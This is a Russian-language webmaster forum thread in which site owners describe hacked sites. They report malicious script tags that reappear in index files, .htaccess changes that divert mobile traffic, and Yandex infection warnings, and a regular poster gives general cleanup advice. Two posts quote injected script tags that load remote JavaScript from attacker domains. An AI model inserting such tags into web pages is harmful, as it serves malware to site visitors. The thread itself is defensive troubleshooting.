Алексей

Рейтинг
180
Регистрация
24.01.2008

Каким образом можно помочь убрать баннер не видя код? Занимаясь самостоятельным удалением вы можете не все удалить, проблемы будут повторятся

SergPolyak:
Абсолютно то же самое на Drupal 6. В логах - тот же IP:

Что если попробовать заблокировать доступ для IP 178.33.69.67?

Ничего не мешает воспользоваться проксями, замучаетесь блокировать.

ТС коды могут находится в любом месте, дистанционно помочь тут вряд ли получится, нужно смотреть сам код движка.

На том форуме, который вы указали проблему не решили?

lock5126:
Неделю назад Яндекс прислал письмо о заражении, обнаружил в index.php код рода
<script type="text/javascript" src="http://a.domen.co.vu/index.php"></script>

Сегодня он опять появился. Права доступа к index минимальные.

Права доступа могут вам не помочь, это вообще не панацея, ищите и смотрите код на предмет вредоносных скриптов

kavins:
Здравствуйте, уважаемые))
Недавно Яндекс поставил мой сайт в разряд подозрительных, обнаружив в нем редирект..при этом никто кроме Яндекса ничего не видел и не обнаруживал..я все проверяла, на многих онлайн ресурсах, айболитом и другими антивирусниками в том числе. потом как-то раз случайно зашла в файл index.html и ужаснулась-там были ссылки скриптом написанные.. причем они были повсюду во всех index.html, во всех почти папках. Я вручную все поудаляла, практически полный ноль в кодах и теперь не знаю где может скрываться взломщик, и ведь все повторится сначала, увы, это я понимаю..
скрипт, который выводился вот: <script id="top100Counter" type="text/javascript" src="hhttp://idiri.ru/tmp/js.js"></script>"
может у кого-то были подобные случаи? поделитесь, прошу! хотелось бы решить проблему глобально.

Т.С. не всегда можно помочь простым советом, необходимо смотреть код и находить все вредоносное. Возможно прописка делалась скриптом во всех html файлах, возможно что-то есть и в других файлах.

Отдельный фтп проблему вашу не решает.

Reriter:
2 сайта разных клиентов хостятся на шаред хостинге ihc.ru. 1 сайт на DLE, другой Webasyst. .htaccess изменяют и сливают мобильный траф.
Свои сайты оттуда перенес, больше .htaccess не трогают...совпадение?

Возможно все это временно или занимаются злоумышленники другим способом монетизации ваших сайтов.

Ставьте проверенные сервисы, проблем не слышал из-за подобных скриптов.

Злоумышленники делают спам рассылку, необходимо искать источник и удалять его.

Всего: 2196